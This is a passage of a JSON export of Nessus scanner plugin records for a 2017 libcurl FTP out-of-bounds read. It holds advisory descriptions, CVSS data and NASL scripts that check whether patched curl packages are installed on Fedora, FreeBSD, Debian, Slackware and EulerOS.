script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"curl-7.53.1-11.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:34:05", "description": "- fix out of bounds read in FTP PWD response parser (CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-01-15T00:00:00", "type": "nessus", "title": "Fedora 27 : curl (2017-e8179c06fd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:curl", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-E8179C06FD.NASL", "href": "https://www.tenable.com/plugins/nessus/105992", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-e8179c06fd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105992);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000254\");\n script_xref(name:\"FEDORA\", value:\"2017-e8179c06fd\");\n\n script_name(english:\"Fedora 27 : curl (2017-e8179c06fd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - fix out of bounds read in FTP PWD response parser\n (CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-e8179c06fd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected curl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"curl-7.55.1-6.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:34:59", "description": "The cURL project reports :\n\nFTP PWD response parser out of bounds read\n\nlibcurl may read outside of a heap allocated buffer when doing FTP.\n\nWhen libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the PWD command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses.\n\nDue to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path.\n\nA malicious server could abuse this fact and effectively prevent libcurl-based clients to work with it - the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-10-05T00:00:00", "type": "nessus", "title": "FreeBSD : cURL -- out of bounds read (ccace707-a8d8-11e7-ac58-b499baebfeaf)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:curl", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CCACE707A8D811E7AC58B499BAEBFEAF.NASL", "href": "https://www.tenable.com/plugins/nessus/103666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103666);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000254\");\n\n script_name(english:\"FreeBSD : cURL -- out of bounds read (ccace707-a8d8-11e7-ac58-b499baebfeaf)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The cURL project reports :\n\nFTP PWD response parser out of bounds read\n\nlibcurl may read outside of a heap allocated buffer when doing FTP.\n\nWhen libcurl connects to an FTP server and successfully logs in\n(anonymous or not), it asks the server for the current directory with\nthe PWD command. The server then responds with a 257 response\ncontaining the path, inside double quotes. The returned path name is\nthen kept by libcurl for subsequent uses.\n\nDue to a flaw in the string parser for this directory name, a\ndirectory name passed like this but without a closing double quote\nwould lead to libcurl not adding a trailing NUL byte to the buffer\nholding the name. When libcurl would then later access the string, it\ncould read beyond the allocated heap buffer and crash or wrongly\naccess data beyond the buffer, thinking it was part of the path.\n\nA malicious server could abuse this fact and effectively prevent\nlibcurl-based clients to work with it - the PWD command is always\nissued on new FTP connections and the mistake has a high chance of\ncausing a segfault.\"\n );\n # https://curl.haxx.se/docs/adv_20171004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://curl.haxx.se/docs/CVE-2017-1000254.html\"\n );\n # https://vuxml.freebsd.org/freebsd/ccace707-a8d8-11e7-ac58-b499baebfeaf.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?967ca801\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"curl<7.56.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:35:02", "description": "It was discovered that there was a out-of-bounds read vulnerability in curl, a command-line and library for transferring data over HTTP/FTP, etc. A malicious FTP server could abuse this to prevent curl-based clients from interacting with it.\n\nSee <https://curl.haxx.se/docs/adv_20171004.html> for more details.\n\nFor Debian 7 'Wheezy', this issue has been fixed in curl version 7.26.0-1+wheezy21.\n\nWe recommend that you upgrade your curl packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-10-06T00:00:00", "type": "nessus", "title": "Debian DLA-1121-1 : curl security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:curl", "p-cpe:/a:debian:debian_linux:libcurl3", "p-cpe:/a:debian:debian_linux:libcurl3-dbg", "p-cpe:/a:debian:debian_linux:libcurl3-gnutls", "p-cpe:/a:debian:debian_linux:libcurl3-nss", "p-cpe:/a:debian:debian_linux:libcurl4-gnutls-dev", "p-cpe:/a:debian:debian_linux:libcurl4-nss-dev", "p-cpe:/a:debian:debian_linux:libcurl4-openssl-dev", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1121.NASL", "href": "https://www.tenable.com/plugins/nessus/103682", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1121-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103682);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000254\");\n\n script_name(english:\"Debian DLA-1121-1 : curl security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that there was a out-of-bounds read vulnerability in\ncurl, a command-line and library for transferring data over HTTP/FTP,\netc. A malicious FTP server could abuse this to prevent curl-based\nclients from interacting with it.\n\nSee <https://curl.haxx.se/docs/adv_20171004.html> for more details.\n\nFor Debian 7 'Wheezy', this issue has been fixed in curl version\n7.26.0-1+wheezy21.\n\nWe recommend that you upgrade your curl packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # https://curl.haxx.se/docs/adv_20171004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://curl.haxx.se/docs/CVE-2017-1000254.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/10/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/curl\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl3-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl3-gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl4-gnutls-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl4-nss-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcurl4-openssl-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"curl\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl3\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl3-dbg\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl3-gnutls\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl3-nss\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl4-gnutls-dev\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl4-nss-dev\", reference:\"7.26.0-1+wheezy21\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcurl4-openssl-dev\", reference:\"7.26.0-1+wheezy21\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:35:14", "description": "New curl packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-10-09T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / 14.2 / current : curl (SSA:2017-279-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:curl", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2017-279-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-279-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103703);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000254\");\n script_xref(name:\"SSA\", value:\"2017-279-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : curl (SSA:2017-279-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New curl packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.419253\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?806797e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected curl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"curl\", pkgver:\"7.56.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:34:26", "description": "According to the version of the curl packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - libcurl may read outside of a heap allocated buffer when doing FTP. When libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the `PWD` command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses.\n Due to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path. A malicious server could abuse this fact and effectively prevent libcurl-based clients to work with it - the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault. The simple fact that this has issue remained undiscovered for this long could suggest that malformed PWD responses are rare in benign servers. We are not aware of any exploit of this flaw. This bug was introduced in commit [415d2e7cb7](https://github.com/curl/curl/commit/415d2e 7cb7), March 2005. In libcurl version 7.56.0, the parser always zero terminates the string but also rejects it if not terminated properly with a final double quote.(CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : curl (EulerOS-SA-2017-1288)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:curl", "p-cpe:/a:huawei:euleros:libcurl", "p-cpe:/a:huawei:euleros:libcurl-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1288.NASL", "href": "https://www.tenable.com/plugins/nessus/104907", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104907);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000254\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : curl (EulerOS-SA-2017-1288)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the curl packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - libcurl may read outside of a heap allocated buffer\n when doing FTP. When libcurl connects to an FTP server\n and successfully logs in (anonymous or not), it asks\n the server for the current directory with the `PWD`\n command. The server then responds with a 257 response\n containing the path, inside double quotes. The returned\n path name is then kept by libcurl for subsequent uses.\n Due to a flaw in the string parser for this directory\n name, a directory name passed like this but without a\n closing double quote would lead to libcurl not adding a\n trailing NUL byte to the buffer holding the name. When\n libcurl would then later access the string, it could\n read beyond the allocated heap buffer and crash or\n wrongly access data beyond the buffer, thinking it was\n part of the path. A malicious server could abuse this\n fact and effectively prevent libcurl-based clients to\n work with it - the PWD command is always issued on new\n FTP connections and the mistake has a high chance of\n causing a segfault. The simple fact that this has issue\n remained 